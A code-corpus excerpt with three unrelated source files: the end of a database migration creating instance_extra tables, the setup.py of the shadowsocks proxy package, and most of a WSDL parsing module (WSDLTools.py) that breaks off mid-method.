(('id', Integer), dict(primary_key=True, nullable=False)),
(('instance_uuid', String(length=36)), dict(nullable=False)),
(('numa_topology', Text), dict(nullable=True)),
]
for prefix in ('', 'shadow_'):
instances = Table(prefix + 'instances', meta, autoload=True)
basename = prefix + 'instance_extra'
if migrate_engine.has_table(basename):
continue
_columns = tuple([Column(*args, **kwargs)
for args, kwargs in columns])
table = Table(basename, meta, *_columns, mysql_engine='InnoDB',
mysql_charset='utf8')
table.create()
# Index
instance_uuid_index = Index(basename + '_idx',
table.c.instance_uuid)
instance_uuid_index.create(migrate_engine)
# Foreign key
if not prefix:
fkey_columns = [table.c.instance_uuid]
fkey_refcolumns = [instances.c.uuid]
instance_fkey = ForeignKeyConstraint(
columns=fkey_columns, refcolumns=fkey_refcolumns)
instance_fkey.create()
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
for prefix in ('', 'shadow_'):
table_name = prefix + 'instance_extra'
if migrate_engine.has_table(table_name):
instance_extra = Table(table_name, meta, autoload=True)
instance_extra.drop()
|
apache-2.0
|
yeyuexia/shadowsocks
|
setup.py
|
929
|
1321
|
import codecs
from setuptools import setup
with codecs.open('README.rst', encoding='utf-8') as f:
long_description = f.read()
setup(
name="shadowsocks",
version="2.8.2",
license='http://www.apache.org/licenses/LICENSE-2.0',
description="A fast tunnel proxy that help you get through firewalls",
author='clowwindy',
author_email='[email protected]',
url='https://github.com/shadowsocks/shadowsocks',
packages=['shadowsocks', 'shadowsocks.crypto'],
package_data={
'shadowsocks': ['README.rst', 'LICENSE']
},
install_requires=[],
entry_points="""
[console_scripts]
sslocal = shadowsocks.local:main
ssserver = shadowsocks.server:main
""",
classifiers=[
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Internet :: Proxy Servers',
],
long_description=long_description,
)
|
apache-2.0
|
grantcoin/grantcoin-new
|
contrib/p2pool/wstools/WSDLTools.py
|
292
|
60641
|
# Copyright (c) 2001 Zope Corporation and Contributors. All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.0 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
ident = "$Id$"
import weakref
from cStringIO import StringIO
from Namespaces import OASIS, XMLNS, WSA, WSA_LIST, WSAW_LIST, WSRF_V1_2, WSRF
from Utility import Collection, CollectionNS, DOM, ElementProxy, basejoin
from XMLSchema import XMLSchema, SchemaReader, WSDLToolsAdapter
class WSDLReader:
"""A WSDLReader creates WSDL instances from urls and xml data."""
# Custom subclasses of WSDLReader may wish to implement a caching
# strategy or other optimizations. Because application needs vary
# so widely, we don't try to provide any caching by default.
def loadFromStream(self, stream, name=None):
"""Return a WSDL instance loaded from a stream object."""
document = DOM.loadDocument(stream)
wsdl = WSDL()
if name:
wsdl.location = name
elif hasattr(stream, 'name'):
wsdl.location = stream.name
wsdl.load(document)
return wsdl
def loadFromURL(self, url):
"""Return a WSDL instance loaded from the given url."""
document = DOM.loadFromURL(url)
wsdl = WSDL()
wsdl.location = url
wsdl.load(document)
return wsdl
def loadFromString(self, data):
"""Return a WSDL instance loaded from an xml string."""
return self.loadFromStream(StringIO(data))
def loadFromFile(self, filename):
"""Return a WSDL instance loaded from the given file."""
file = open(filename, 'rb')
try:
wsdl = self.loadFromStream(file)
finally:
file.close()
return wsdl
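# --- Illustrative addition, not part of the original module ---
# The comment on WSDLReader suggests subclasses may add a caching strategy;
# a minimal sketch of such a subclass, memoizing WSDL instances by URL:
class _CachingWSDLReader(WSDLReader):
    def __init__(self):
        self._cache = {}
    def loadFromURL(self, url):
        # Parse each URL at most once; later calls reuse the same instance.
        if url not in self._cache:
            self._cache[url] = WSDLReader.loadFromURL(self, url)
        return self._cache[url]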
class WSDL:
"""A WSDL object models a WSDL service description. WSDL objects
may be created manually or loaded from an xml representation
using a WSDLReader instance."""
def __init__(self, targetNamespace=None, strict=1):
self.targetNamespace = targetNamespace or 'urn:this-document.wsdl'
self.documentation = ''
self.location = None
self.document = None
self.name = None
self.services = CollectionNS(self)
self.messages = CollectionNS(self)
self.portTypes = CollectionNS(self)
self.bindings = CollectionNS(self)
self.imports = Collection(self)
self.types = Types(self)
self.extensions = []
self.strict = strict
def __del__(self):
if self.document is not None:
self.document.unlink()
version = '1.1'
def addService(self, name, documentation='', targetNamespace=None):
if self.services.has_key(name):
raise WSDLError(
'Duplicate service element: %s' % name
)
item = Service(name, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.services[name] = item
return item
def addMessage(self, name, documentation='', targetNamespace=None):
if self.messages.has_key(name):
raise WSDLError(
'Duplicate message element: %s.' % name
)
item = Message(name, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.messages[name] = item
return item
def addPortType(self, name, documentation='', targetNamespace=None):
if self.portTypes.has_key(name):
raise WSDLError(
                'Duplicate portType element: %s' % name
)
item = PortType(name, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.portTypes[name] = item
return item
def addBinding(self, name, type, documentation='', targetNamespace=None):
if self.bindings.has_key(name):
raise WSDLError(
'Duplicate binding element: %s' % name
)
item = Binding(name, type, documentation)
if targetNamespace:
item.targetNamespace = targetNamespace
self.bindings[name] = item
return item
def addImport(self, namespace, location):
item = ImportElement(namespace, location)
self.imports[namespace] = item
return item
def toDom(self):
""" Generate a DOM representation of the WSDL instance.
Not dealing with generating XML Schema, thus the targetNamespace
of all XML Schema elements or types used by WSDL message parts
needs to be specified via import information items.
"""
namespaceURI = DOM.GetWSDLUri(self.version)
        self.document = DOM.createDocument(namespaceURI, 'wsdl:definitions')
# Set up a couple prefixes for easy reading.
child = DOM.getElement(self.document, None)
child.setAttributeNS(None, 'targetNamespace', self.targetNamespace)
child.setAttributeNS(XMLNS.BASE, 'xmlns:wsdl', namespaceURI)
child.setAttributeNS(XMLNS.BASE, 'xmlns:xsd', 'http://www.w3.org/1999/XMLSchema')
child.setAttributeNS(XMLNS.BASE, 'xmlns:soap', 'http://schemas.xmlsoap.org/wsdl/soap/')
child.setAttributeNS(XMLNS.BASE, 'xmlns:tns', self.targetNamespace)
if self.name:
child.setAttributeNS(None, 'name', self.name)
# wsdl:import
for item in self.imports:
item.toDom()
# wsdl:message
for item in self.messages:
item.toDom()
# wsdl:portType
for item in self.portTypes:
item.toDom()
# wsdl:binding
for item in self.bindings:
item.toDom()
# wsdl:service
for item in self.services:
item.toDom()
def load(self, document):
# We save a reference to the DOM document to ensure that elements
# saved as "extensions" will continue to have a meaningful context
# for things like namespace references. The lifetime of the DOM
# document is bound to the lifetime of the WSDL instance.
self.document = document
definitions = DOM.getElement(document, 'definitions', None, None)
if definitions is None:
raise WSDLError(
'Missing <definitions> element.'
)
self.version = DOM.WSDLUriToVersion(definitions.namespaceURI)
NS_WSDL = DOM.GetWSDLUri(self.version)
self.targetNamespace = DOM.getAttr(definitions, 'targetNamespace',
None, None)
self.name = DOM.getAttr(definitions, 'name', None, None)
self.documentation = GetDocumentation(definitions)
#
        # Retrieve all <wsdl:import>s and append each imported document's
        # children to the main document.  The first pass grabs the original
        # <wsdl:import>s, the next pass grabs any <wsdl:import>s pulled in
        # by those, and so on; the loop exits once no new imports remain.
#
imported = []
base_location = self.location
do_it = True
while do_it:
do_it = False
for element in DOM.getElements(definitions, 'import', NS_WSDL):
location = DOM.getAttr(element, 'location')
if base_location is not None:
location = basejoin(base_location, location)
if location not in imported:
do_it = True
self._import(document, element, base_location)
imported.append(location)
else:
definitions.removeChild(element)
base_location = None
#
# No more <wsdl:import>'s, now load up all other
# WSDL information items.
#
for element in DOM.getElements(definitions, None, None):
targetNamespace = DOM.getAttr(element, 'targetNamespace')
localName = element.localName
if not DOM.nsUriMatch(element.namespaceURI, NS_WSDL):
if localName == 'schema':
tns = DOM.getAttr(element, 'targetNamespace')
reader = SchemaReader(base_url=self.imports[tns].location)
schema = reader.loadFromNode(WSDLToolsAdapter(self),
element)
# schema.setBaseUrl(self.location)
self.types.addSchema(schema)
else:
self.extensions.append(element)
continue
elif localName == 'message':
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
message = self.addMessage(name, docs, targetNamespace)
parts = DOM.getElements(element, 'part', NS_WSDL)
message.load(parts)
continue
elif localName == 'portType':
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
ptype = self.addPortType(name, docs, targetNamespace)
#operations = DOM.getElements(element, 'operation', NS_WSDL)
#ptype.load(operations)
ptype.load(element)
continue
elif localName == 'binding':
name = DOM.getAttr(element, 'name')
type = DOM.getAttr(element, 'type', default=None)
if type is None:
raise WSDLError(
'Missing type attribute for binding %s.' % name
)
type = ParseQName(type, element)
docs = GetDocumentation(element)
binding = self.addBinding(name, type, docs, targetNamespace)
operations = DOM.getElements(element, 'operation', NS_WSDL)
binding.load(operations)
binding.load_ex(GetExtensions(element))
continue
elif localName == 'service':
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
service = self.addService(name, docs, targetNamespace)
ports = DOM.getElements(element, 'port', NS_WSDL)
service.load(ports)
service.load_ex(GetExtensions(element))
continue
elif localName == 'types':
self.types.documentation = GetDocumentation(element)
base_location = DOM.getAttr(element, 'base-location')
if base_location:
element.removeAttribute('base-location')
base_location = base_location or self.location
reader = SchemaReader(base_url=base_location)
for item in DOM.getElements(element, None, None):
if item.localName == 'schema':
schema = reader.loadFromNode(WSDLToolsAdapter(self), item)
# XXX <types> could have been imported
#schema.setBaseUrl(self.location)
schema.setBaseUrl(base_location)
self.types.addSchema(schema)
else:
self.types.addExtension(item)
# XXX remove the attribute
# element.removeAttribute('base-location')
continue
def _import(self, document, element, base_location=None):
        '''Algorithm: take the <import> element's children, clone them,
and add them to the main document. Support for relative
locations is a bit complicated. The orig document context
is lost, so we need to store base location in DOM elements
representing <types>, by creating a special temporary
"base-location" attribute, and <import>, by resolving
the relative "location" and storing it as "location".
document -- document we are loading
element -- DOM Element representing <import>
base_location -- location of document from which this
<import> was gleaned.
'''
namespace = DOM.getAttr(element, 'namespace', default=None)
location = DOM.getAttr(element, 'location', default=None)
if namespace is None or location is None:
raise WSDLError(
'Invalid import element (missing namespace or location).'
)
if base_location:
location = basejoin(base_location, location)
element.setAttributeNS(None, 'location', location)
obimport = self.addImport(namespace, location)
obimport._loaded = 1
importdoc = DOM.loadFromURL(location)
try:
if location.find('#') > -1:
idref = location.split('#')[-1]
imported = DOM.getElementById(importdoc, idref)
else:
imported = importdoc.documentElement
if imported is None:
raise WSDLError(
'Import target element not found for: %s' % location
)
imported_tns = DOM.findTargetNS(imported)
if imported_tns != namespace:
return
if imported.localName == 'definitions':
imported_nodes = imported.childNodes
else:
imported_nodes = [imported]
parent = element.parentNode
parent.removeChild(element)
for node in imported_nodes:
if node.nodeType != node.ELEMENT_NODE:
continue
child = DOM.importNode(document, node, 1)
parent.appendChild(child)
child.setAttribute('targetNamespace', namespace)
attrsNS = imported._attrsNS
for attrkey in attrsNS.keys():
if attrkey[0] == DOM.NS_XMLNS:
attr = attrsNS[attrkey].cloneNode(1)
child.setAttributeNode(attr)
#XXX Quick Hack, should be in WSDL Namespace.
if child.localName == 'import':
rlocation = child.getAttributeNS(None, 'location')
alocation = basejoin(location, rlocation)
child.setAttribute('location', alocation)
elif child.localName == 'types':
child.setAttribute('base-location', location)
finally:
importdoc.unlink()
return location
class Element:
"""A class that provides common functions for WSDL element classes."""
def __init__(self, name=None, documentation=''):
self.name = name
self.documentation = documentation
self.extensions = []
def addExtension(self, item):
item.parent = weakref.ref(self)
self.extensions.append(item)
def getWSDL(self):
"""Return the WSDL object that contains this information item."""
parent = self
while 1:
# skip any collections
if isinstance(parent, WSDL):
return parent
try: parent = parent.parent()
except: break
return None
class ImportElement(Element):
def __init__(self, namespace, location):
self.namespace = namespace
self.location = location
# def getWSDL(self):
# """Return the WSDL object that contains this Message Part."""
# return self.parent().parent()
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'import')
epc.setAttributeNS(None, 'namespace', self.namespace)
epc.setAttributeNS(None, 'location', self.location)
_loaded = None
class Types(Collection):
default = lambda self,k: k.targetNamespace
def __init__(self, parent):
Collection.__init__(self, parent)
self.documentation = ''
self.extensions = []
def addSchema(self, schema):
name = schema.targetNamespace
self[name] = schema
return schema
def addExtension(self, item):
self.extensions.append(item)
class Message(Element):
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.parts = Collection(self)
def addPart(self, name, type=None, element=None):
if self.parts.has_key(name):
raise WSDLError(
'Duplicate message part element: %s' % name
)
if type is None and element is None:
raise WSDLError(
'Missing type or element attribute for part: %s' % name
)
item = MessagePart(name)
item.element = element
item.type = type
self.parts[name] = item
return item
def load(self, elements):
for element in elements:
name = DOM.getAttr(element, 'name')
part = MessagePart(name)
self.parts[name] = part
elemref = DOM.getAttr(element, 'element', default=None)
typeref = DOM.getAttr(element, 'type', default=None)
if typeref is None and elemref is None:
raise WSDLError(
'No type or element attribute for part: %s' % name
)
if typeref is not None:
part.type = ParseTypeRef(typeref, element)
if elemref is not None:
part.element = ParseTypeRef(elemref, element)
# def getElementDeclaration(self):
# """Return the XMLSchema.ElementDeclaration instance or None"""
# element = None
# if self.element:
# nsuri,name = self.element
# wsdl = self.getWSDL()
# if wsdl.types.has_key(nsuri) and wsdl.types[nsuri].elements.has_key(name):
# element = wsdl.types[nsuri].elements[name]
# return element
#
# def getTypeDefinition(self):
# """Return the XMLSchema.TypeDefinition instance or None"""
# type = None
# if self.type:
# nsuri,name = self.type
# wsdl = self.getWSDL()
# if wsdl.types.has_key(nsuri) and wsdl.types[nsuri].types.has_key(name):
# type = wsdl.types[nsuri].types[name]
# return type
# def getWSDL(self):
# """Return the WSDL object that contains this Message Part."""
# return self.parent().parent()
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'message')
epc.setAttributeNS(None, 'name', self.name)
for part in self.parts:
part.toDom(epc._getNode())
class MessagePart(Element):
def __init__(self, name):
Element.__init__(self, name, '')
self.element = None
self.type = None
# def getWSDL(self):
# """Return the WSDL object that contains this Message Part."""
# return self.parent().parent().parent().parent()
def getTypeDefinition(self):
wsdl = self.getWSDL()
nsuri,name = self.type
schema = wsdl.types.get(nsuri, {})
return schema.get(name)
def getElementDeclaration(self):
wsdl = self.getWSDL()
nsuri,name = self.element
schema = wsdl.types.get(nsuri, {})
return schema.get(name)
def toDom(self, node):
"""node -- node representing message"""
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'part')
epc.setAttributeNS(None, 'name', self.name)
if self.element is not None:
ns,name = self.element
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'element', '%s:%s'%(prefix,name))
elif self.type is not None:
ns,name = self.type
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'type', '%s:%s'%(prefix,name))
class PortType(Element):
    '''PortType has an anyAttribute, and thus must provide an extensible
    mechanism for supporting such attributes.  ResourceProperties is
    specified in WS-ResourceProperties; wsa:Action is specified in
    WS-Addressing.
    Instance Data:
        name -- name attribute
        resourceProperties -- optional wsr:ResourceProperties attribute;
            its value is a QName that is parsed into a (namespaceURI, name)
            tuple representing a Global Element Declaration.
        operations
    '''
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.operations = Collection(self)
self.resourceProperties = None
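        # Illustrative note (added, not in the original source): a
        # ResourceProperties attribute value such as 'tns:Props' is parsed
        # by ParseQName into ('<uri bound to tns>', 'Props'), the
        # (namespaceURI, name) pair described in the class docstring.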
# def getWSDL(self):
# return self.parent().parent()
def getTargetNamespace(self):
return self.targetNamespace or self.getWSDL().targetNamespace
def getResourceProperties(self):
return self.resourceProperties
def addOperation(self, name, documentation='', parameterOrder=None):
item = Operation(name, documentation, parameterOrder)
self.operations[name] = item
return item
def load(self, element):
self.name = DOM.getAttr(element, 'name')
self.documentation = GetDocumentation(element)
self.targetNamespace = DOM.getAttr(element, 'targetNamespace')
for nsuri in WSRF_V1_2.PROPERTIES.XSD_LIST:
if DOM.hasAttr(element, 'ResourceProperties', nsuri):
rpref = DOM.getAttr(element, 'ResourceProperties', nsuri)
self.resourceProperties = ParseQName(rpref, element)
NS_WSDL = DOM.GetWSDLUri(self.getWSDL().version)
elements = DOM.getElements(element, 'operation', NS_WSDL)
for element in elements:
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
param_order = DOM.getAttr(element, 'parameterOrder', default=None)
if param_order is not None:
param_order = param_order.split(' ')
operation = self.addOperation(name, docs, param_order)
item = DOM.getElement(element, 'input', None, None)
if item is not None:
name = DOM.getAttr(item, 'name')
docs = GetDocumentation(item)
msgref = DOM.getAttr(item, 'message')
message = ParseQName(msgref, item)
for WSA in WSA_LIST + WSAW_LIST:
action = DOM.getAttr(item, 'Action', WSA.ADDRESS, None)
if action: break
operation.setInput(message, name, docs, action)
item = DOM.getElement(element, 'output', None, None)
if item is not None:
name = DOM.getAttr(item, 'name')
docs = GetDocumentation(item)
msgref = DOM.getAttr(item, 'message')
message = ParseQName(msgref, item)
for WSA in WSA_LIST + WSAW_LIST:
action = DOM.getAttr(item, 'Action', WSA.ADDRESS, None)
if action: break
operation.setOutput(message, name, docs, action)
for item in DOM.getElements(element, 'fault', None):
name = DOM.getAttr(item, 'name')
docs = GetDocumentation(item)
msgref = DOM.getAttr(item, 'message')
message = ParseQName(msgref, item)
for WSA in WSA_LIST + WSAW_LIST:
action = DOM.getAttr(item, 'Action', WSA.ADDRESS, None)
if action: break
operation.addFault(message, name, docs, action)
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'portType')
epc.setAttributeNS(None, 'name', self.name)
if self.resourceProperties:
ns,name = self.resourceProperties
prefix = epc.getPrefix(ns)
epc.setAttributeNS(WSRF.PROPERTIES.LATEST, 'ResourceProperties',
'%s:%s'%(prefix,name))
for op in self.operations:
op.toDom(epc._getNode())
class Operation(Element):
def __init__(self, name, documentation='', parameterOrder=None):
Element.__init__(self, name, documentation)
self.parameterOrder = parameterOrder
self.faults = Collection(self)
self.input = None
self.output = None
def getWSDL(self):
"""Return the WSDL object that contains this Operation."""
return self.parent().parent().parent().parent()
def getPortType(self):
return self.parent().parent()
def getInputAction(self):
"""wsa:Action attribute"""
return GetWSAActionInput(self)
def getInputMessage(self):
if self.input is None:
return None
wsdl = self.getPortType().getWSDL()
return wsdl.messages[self.input.message]
def getOutputAction(self):
"""wsa:Action attribute"""
return GetWSAActionOutput(self)
def getOutputMessage(self):
if self.output is None:
return None
wsdl = self.getPortType().getWSDL()
return wsdl.messages[self.output.message]
def getFaultAction(self, name):
"""wsa:Action attribute"""
return GetWSAActionFault(self, name)
def getFaultMessage(self, name):
wsdl = self.getPortType().getWSDL()
return wsdl.messages[self.faults[name].message]
def addFault(self, message, name, documentation='', action=None):
if self.faults.has_key(name):
raise WSDLError(
'Duplicate fault element: %s' % name
)
item = MessageRole('fault', message, name, documentation, action)
self.faults[name] = item
return item
def setInput(self, message, name='', documentation='', action=None):
self.input = MessageRole('input', message, name, documentation, action)
self.input.parent = weakref.ref(self)
return self.input
def setOutput(self, message, name='', documentation='', action=None):
self.output = MessageRole('output', message, name, documentation, action)
self.output.parent = weakref.ref(self)
return self.output
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'operation')
epc.setAttributeNS(None, 'name', self.name)
node = epc._getNode()
if self.input:
self.input.toDom(node)
if self.output:
self.output.toDom(node)
for fault in self.faults:
fault.toDom(node)
class MessageRole(Element):
def __init__(self, type, message, name='', documentation='', action=None):
Element.__init__(self, name, documentation)
self.message = message
self.type = type
self.action = action
def getWSDL(self):
"""Return the WSDL object that contains this information item."""
parent = self
while 1:
# skip any collections
if isinstance(parent, WSDL):
return parent
try: parent = parent.parent()
except: break
return None
def getMessage(self):
"""Return the WSDL object that represents the attribute message
(namespaceURI, name) tuple
"""
wsdl = self.getWSDL()
return wsdl.messages[self.message]
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), self.type)
if not isinstance(self.message, basestring) and len(self.message) == 2:
ns,name = self.message
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'message', '%s:%s' %(prefix,name))
else:
epc.setAttributeNS(None, 'message', self.message)
if self.action:
epc.setAttributeNS(WSA.ADDRESS, 'Action', self.action)
if self.name:
epc.setAttributeNS(None, 'name', self.name)
class Binding(Element):
def __init__(self, name, type, documentation=''):
Element.__init__(self, name, documentation)
self.operations = Collection(self)
self.type = type
# def getWSDL(self):
# """Return the WSDL object that contains this binding."""
# return self.parent().parent()
def getPortType(self):
"""Return the PortType object associated with this binding."""
return self.getWSDL().portTypes[self.type]
def findBinding(self, kind):
for item in self.extensions:
if isinstance(item, kind):
return item
return None
def findBindings(self, kind):
return [ item for item in self.extensions if isinstance(item, kind) ]
def addOperationBinding(self, name, documentation=''):
item = OperationBinding(name, documentation)
self.operations[name] = item
return item
def load(self, elements):
for element in elements:
name = DOM.getAttr(element, 'name')
docs = GetDocumentation(element)
opbinding = self.addOperationBinding(name, docs)
opbinding.load_ex(GetExtensions(element))
item = DOM.getElement(element, 'input', None, None)
if item is not None:
#TODO: addInputBinding?
mbinding = MessageRoleBinding('input')
mbinding.documentation = GetDocumentation(item)
opbinding.input = mbinding
mbinding.load_ex(GetExtensions(item))
mbinding.parent = weakref.ref(opbinding)
item = DOM.getElement(element, 'output', None, None)
if item is not None:
mbinding = MessageRoleBinding('output')
mbinding.documentation = GetDocumentation(item)
opbinding.output = mbinding
mbinding.load_ex(GetExtensions(item))
mbinding.parent = weakref.ref(opbinding)
for item in DOM.getElements(element, 'fault', None):
name = DOM.getAttr(item, 'name')
mbinding = MessageRoleBinding('fault', name)
mbinding.documentation = GetDocumentation(item)
opbinding.faults[name] = mbinding
mbinding.load_ex(GetExtensions(item))
mbinding.parent = weakref.ref(opbinding)
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'binding':
transport = DOM.getAttr(e, 'transport', default=None)
style = DOM.getAttr(e, 'style', default='document')
ob = SoapBinding(transport, style)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'binding':
verb = DOM.getAttr(e, 'verb')
ob = HttpBinding(verb)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'binding')
epc.setAttributeNS(None, 'name', self.name)
ns,name = self.type
prefix = epc.getPrefix(ns)
epc.setAttributeNS(None, 'type', '%s:%s' %(prefix,name))
node = epc._getNode()
for ext in self.extensions:
ext.toDom(node)
for op_binding in self.operations:
op_binding.toDom(node)
class OperationBinding(Element):
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.input = None
self.output = None
self.faults = Collection(self)
# def getWSDL(self):
# """Return the WSDL object that contains this binding."""
# return self.parent().parent().parent().parent()
def getBinding(self):
"""Return the parent Binding object of the operation binding."""
return self.parent().parent()
def getOperation(self):
"""Return the abstract Operation associated with this binding."""
return self.getBinding().getPortType().operations[self.name]
def findBinding(self, kind):
for item in self.extensions:
if isinstance(item, kind):
return item
return None
def findBindings(self, kind):
return [ item for item in self.extensions if isinstance(item, kind) ]
def addInputBinding(self, binding):
if self.input is None:
self.input = MessageRoleBinding('input')
self.input.parent = weakref.ref(self)
self.input.addExtension(binding)
return binding
def addOutputBinding(self, binding):
if self.output is None:
self.output = MessageRoleBinding('output')
self.output.parent = weakref.ref(self)
self.output.addExtension(binding)
return binding
def addFaultBinding(self, name, binding):
        # Look the fault up in the faults collection (the original called
        # self.get(), which does not exist on OperationBinding) and register
        # newly created bindings so they are not silently dropped.
        fault = self.faults.get(name, None)
        if fault is None:
            fault = MessageRoleBinding('fault', name)
            self.faults[name] = fault
fault.addExtension(binding)
return binding
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'operation':
soapaction = DOM.getAttr(e, 'soapAction', default=None)
style = DOM.getAttr(e, 'style', default=None)
ob = SoapOperationBinding(soapaction, style)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'operation':
location = DOM.getAttr(e, 'location')
ob = HttpOperationBinding(location)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), 'operation')
epc.setAttributeNS(None, 'name', self.name)
node = epc._getNode()
for ext in self.extensions:
ext.toDom(node)
if self.input:
self.input.toDom(node)
if self.output:
self.output.toDom(node)
for fault in self.faults:
fault.toDom(node)
class MessageRoleBinding(Element):
def __init__(self, type, name='', documentation=''):
Element.__init__(self, name, documentation)
self.type = type
def findBinding(self, kind):
for item in self.extensions:
if isinstance(item, kind):
return item
return None
def findBindings(self, kind):
return [ item for item in self.extensions if isinstance(item, kind) ]
def load_ex(self, elements):
for e in elements:
ns, name = e.namespaceURI, e.localName
if ns in DOM.NS_SOAP_BINDING_ALL and name == 'body':
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
parts = DOM.getAttr(e, 'parts', default=None)
use = DOM.getAttr(e, 'use', default=None)
if use is None:
raise WSDLError(
'Invalid soap:body binding element.'
)
ob = SoapBodyBinding(use, namespace, encstyle, parts)
self.addExtension(ob)
continue
elif ns in DOM.NS_SOAP_BINDING_ALL and name == 'fault':
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
name = DOM.getAttr(e, 'name', default=None)
use = DOM.getAttr(e, 'use', default=None)
if use is None or name is None:
raise WSDLError(
'Invalid soap:fault binding element.'
)
ob = SoapFaultBinding(name, use, namespace, encstyle)
self.addExtension(ob)
continue
elif ns in DOM.NS_SOAP_BINDING_ALL and name in (
'header', 'headerfault'
):
encstyle = DOM.getAttr(e, 'encodingStyle', default=None)
namespace = DOM.getAttr(e, 'namespace', default=None)
message = DOM.getAttr(e, 'message')
part = DOM.getAttr(e, 'part')
use = DOM.getAttr(e, 'use')
if name == 'header':
_class = SoapHeaderBinding
else:
_class = SoapHeaderFaultBinding
message = ParseQName(message, e)
ob = _class(message, part, use, namespace, encstyle)
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'urlReplacement':
ob = HttpUrlReplacementBinding()
self.addExtension(ob)
continue
elif ns in DOM.NS_HTTP_BINDING_ALL and name == 'urlEncoded':
ob = HttpUrlEncodedBinding()
self.addExtension(ob)
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'multipartRelated':
ob = MimeMultipartRelatedBinding()
self.addExtension(ob)
ob.load_ex(GetExtensions(e))
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'content':
part = DOM.getAttr(e, 'part', default=None)
type = DOM.getAttr(e, 'type', default=None)
ob = MimeContentBinding(part, type)
self.addExtension(ob)
continue
elif ns in DOM.NS_MIME_BINDING_ALL and name == 'mimeXml':
part = DOM.getAttr(e, 'part', default=None)
ob = MimeXmlBinding(part)
self.addExtension(ob)
continue
else:
self.addExtension(e)
def toDom(self, node):
wsdl = self.getWSDL()
ep = ElementProxy(None, node)
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), self.type)
node = epc._getNode()
for item in self.extensions:
if item: item.toDom(node)
class Service(Element):
def __init__(self, name, documentation=''):
Element.__init__(self, name, documentation)
self.ports = Collection(self)
def getWSDL(self):
return self.parent().parent()
def addPort(self, name, binding, documentation=''):
item = Port(name, binding, documentation)
self.ports[name] = item
return item
def load(self, elements):
for element in elements:
name = DOM.getAttr(element, 'name', default=None)
docs = GetDocumentation(element)
binding = DOM.getAttr(element, 'binding', default=None)
if name is None or binding is None:
raise WSDLError(
'Invalid port element.'
)
binding = ParseQName(binding, element)
port = self.addPort(name, binding, docs)
port.load_ex(GetExtensions(element))
def load_ex(self, elements):
for e in elements:
self.addExtension(e)
def toDom(self):
wsdl = self.getWSDL()
ep = ElementProxy(None, DOM.getElement(wsdl.document, None))
epc = ep.createAppendElement(DOM.GetWSDLUri(wsdl.version), "service")
epc.setAttributeNS(None, "name", self.name)
node = epc._getNode()
for port in self.ports:
port.toDom(node)
class Port(Element):
def __init__(self, name, binding, documentation=''):
Element.__init__(self, name, documentation)
self.binding = binding
# def getWSDL(self):
# return self.parent().parent().getWSDL()
def getService(self):
"""Return the Service object associated with this port."""
return self.parent().parent()
def getBinding(self):
"""Return the Binding object that is referenced by this port."""
wsdl = self.getService().getWSDL()
